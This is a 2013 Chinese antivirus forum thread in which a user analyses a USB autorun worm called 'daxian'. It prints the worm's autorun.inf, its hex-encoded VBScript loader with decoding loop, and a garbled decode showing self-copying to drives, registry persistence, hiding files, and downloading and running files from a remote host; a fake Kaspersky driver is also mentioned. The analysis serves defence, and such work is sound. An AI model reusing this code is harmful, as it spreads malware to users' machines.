巴黎没有摩天轮~ - 2013-2-26 21:20:00
主体
up.vbe.exe (S H)
`.vbs (S H)
autorun.inf
自动运行病毒。
daxian4.0
[AutoRun]
daxianbiyeliunian 2007.8.1
open=WScript.exe .\`.vbs
up.vbe
shell\open=打开(&O)
2007-10-13 13:01:25
shell\open\Command=WScript.exe .\`.vbs
shell\open\Default=1
daxian5.0
以上为autorun.inf
a="mianshavbs"
P="7665723D22342E3022
74696C653D2264617869616E222676657220
61626F75743D2264617869616E626979656C69756E69616E20323030372E382E3122
等等
是`.vbs
(用ue加工了 0D0A变成cflf了,即换行+回车)
:Q="EXECUTE """"":R="&CHR(&H":N=")":DO WHILE LEN(P)>1:IF ISNUMERIC(LEFT(P,1)) THEN Q=Q&R&LEFT(P,2)&N:P=MID(P,3) ELSE Q=Q&R&LEFT(P,4)&N:P=MID(P,5)
LOOP:MsgBox Q
这是病毒体后面的东西
可以知道 全是Ascii码。
写了一个vb程序 使ascii变成了vbs(可以识别的东西)
但是写出的程序有bug 勉强可以翻译出来所有的东西
翻译出的结果
ver"40"tie"daxia"&ver abut"daxiabiyeiuia 200781"frurchr(104)&chr(116)&chr(116)&chr(112)&""&chr(104)&chr(103)&""&chr(100)&"i"&chr(103)&chr(104)&"ui123"&chr(99)&"wa"&chr(97)&"s"&chr(112) errr resue extdi wshdi WshSheSet Wsh Createbect("WScriptShe")set WshSheWscriptCreatebect("WscriptShe")Set FS Createbect("ScriptigFieSystebect")set dir FSGetSpeciaFder(1)Set dc FSDrivesuwaeWscriptScriptaeuueft(WscriptScriptFuaee(WscriptScriptFuae)e(WscriptScriptae))if uudir&"" the systrueFr Each d I dcif uud&"" the pedisWshSheRu("exprer "&d3fase)extif t systrue thewscriptseep 2000set ygetbect("wigtsrtciv2") set xyexecquery("seect fr wi32prcess where ae'wscriptexe'") i0 fr each i x ii1ext if i1 the wscriptquited ifyicagif readtxt(uu&"autruif"1)tie thebuidif verwuwaeed Ifcpyexereadtxt(uu&"autruif"5)&"exe"radiessit(Rd (1011)) 1 If fsFieExists(uu&cpyexe) ad ss3 theif systrue the WshSheru uu&cpyexeEseif eft((readtxt("cdatebi"1))9)eft(w9) theshuxig "cdatebi"0set bi fsCreateTextFie("cdatebi" True)biwriteie wbicseshuxig "cdatebi"24dwverreadtxt(uu&"autruif"5)dwfie uu&"teptxt"frur0Set peFie FSpeTextFie(uu&"teptxt" 1) use peFieReadiedwis peFieReadiedwver peFieReadiedwae dwver&"exe"dwfr peFieReadievbsver peFieReadievbsae peFieReadievbsur peFieReadieguagga peFieReadiepeFieCse FSDeeteFie(uu&"teptxt")if dwis1 theIf vbsverver thedwfie uu&vbsaevbsur1wscriptquited ifIf dwverdwver r t fsFieExists(uu&cpyexe) theshuxig uu&cpyexe0If fsFieExists(uu&cpyexe) the FSDeeteFie(uu&cpyexe)dwfie uu&dwaedwfr0buidif dwverwguaggacpyexedwaeed ifed ifed ifEd Ifif systrue theIf t fsFieExists(uu&"`ii") thecpyvbs dir&"`ii"ed ifgara()WshSheru uu&uwaeeseshuxig uu&uwae24cpyvbs dir&"`vbe"cpyvbs dir&"`ii"CpyFie uu&"autruif"dir&"autruif"CpyFie uu&cpyexedir&""&cpyexeshuxig dir&""&cpyexe24if uu"C" thecpyvbs "c`vbs"CpyFie uu&"autruif""cautruif"CpyFie uu&cpyexe"c"&cpyexeed ifhuceWshSheru dir&"`vbe"ed iffucti cpyfie(fiewhere)shuxig where0if fsFieExists(fie) the FSCpyFie fiewhereTrueed fuctifucti cpyvbs(where)shuxig where0set seffspetextfie(uu&uwae1)vbscpysefreada sefcse set vbs fsCreateTextFie(where True)vbswrite vbscpyvbscseshuxig where24ed fuctifucti huce()RegPath"HEYCAACHIESFTWAREicrsftWidwsCurretVersipiciesExprerru" Typeae"REGS" eyae"exprer" eyData"`vbe" WshSheRegWrite RegPath&eyaeeyDataTypeae ed fuctifucti yicag()RegPath"HEYCURRETUSERSftwareicrsftWidwsCurretVersiExprerAdvaced" Typeae"REGDWRD" eyae"ShwSuperHidde" eyData"00000000" WshSheRegWrite RegPath&eyaeeyDataTypeae ed fuctifucti buidif(exeverexeaeadv)shuxig uu&"autruif"0set ii fsCreateTextFie(uu&"autruif" True)iiwriteie tieiiwriteie "AutRu"iiwriteie abutiiwriteie "peWScriptexe `vbs"iiwriteie exeveriiwriteie "shepe(&)"iiwriteie exeaeiiwriteie "shepeCadWScriptexe `vbs"iiwriteie "shepeDefaut1"iiwriteie adviicseshuxig uu&"autruif"124ed fuctifucti readtxt(whereie) if fsFieExists(where) theSet readfie fspeTextFie(where 1) i0 d whie iieii1strie readfieReadiepreadfieCsereadtxtstrieesereadtxt"tfud"ed ifed fuctifucti shuxig(fiechage)if fsFieExists(fie) theSet Fie FSGetFie(fie) FieAttributes chageSet Fie thiged ifed fuctifucti dwfie(cafieurfierufie)shuxig cafie0ica Case(cafie)iRete Case(urfie)'if 12 the Wscriptech "Ipssibe!"Set xPst Createbect("icrsftXHTTP") 'if 12 the Wscriptech "Ipssibe!"xPstpe "get"iRete0 'if 12 the Wscriptech "Ipssibe!"xPstSed() 'if 12 the Wscriptech "Ipssibe!"Set sGet Createbect("ADDBStrea") 'if 12 the Wscriptech "Ipssibe!"sGetde 3 'if 12 the Wscriptech "Ipssibe!"sGetType 1 'if 12 the Wscriptech "Ipssibe!"sGetpe() 'if 12 the Wscriptech "Ipssibe!"sGetWrite(xPstrespseBdy) 'if 12 the Wscriptech "Ipssibe!"sGetSaveTFie ica2 'if 12 the Wscriptech "Ipssibe!"shuxig cafie24if rufie1 the Wshru icaed fuctifucti gara()dFr Each d I dcIf dDriveType 3 r (dDriveType 1 ad d"A" ad d "B") TheIf fsFieExists(d&"`vbs") ad fsFieExists(d&"autruif") theif readtxt(d&"autruif"1)tie theCpyFie dir&"autruif"d&"autruif"CpyFie dir&""&cpyexed&""&cpyexeCpyFie dir&"`ii"d&"`vbs"ed ifeseCpyFie dir&"autruif"d&"autruif"CpyFie dir&""&cpyexed&""&cpyexeCpyFie dir&"`ii"d&"`vbs"ed ifEd Ifextwscriptseep 2000ped fucti
+++++++++++++++++++ ASSEMBLY CODE LISTING ++++++++++++++++++
//********************** Start of Code in Object .text **************
Program Entry Point = 00046030 (klif.sys.bingd File Offset:00027C30)
看见这个了么?
你以为是卡巴斯基?
哈哈
是病毒的sys文件...牛人呀 把卡巴干掉了...我的电脑上正好是卡巴...所以...在linux下查毒时候(手工)没发现。。。IceSword显示红字以为没问题呢,,,
networkedition - 2013-2-27 9:10:00
请lz将.vbs 压缩跟帖上传。
© 2000 - 2024 Rising Corp. Ltd.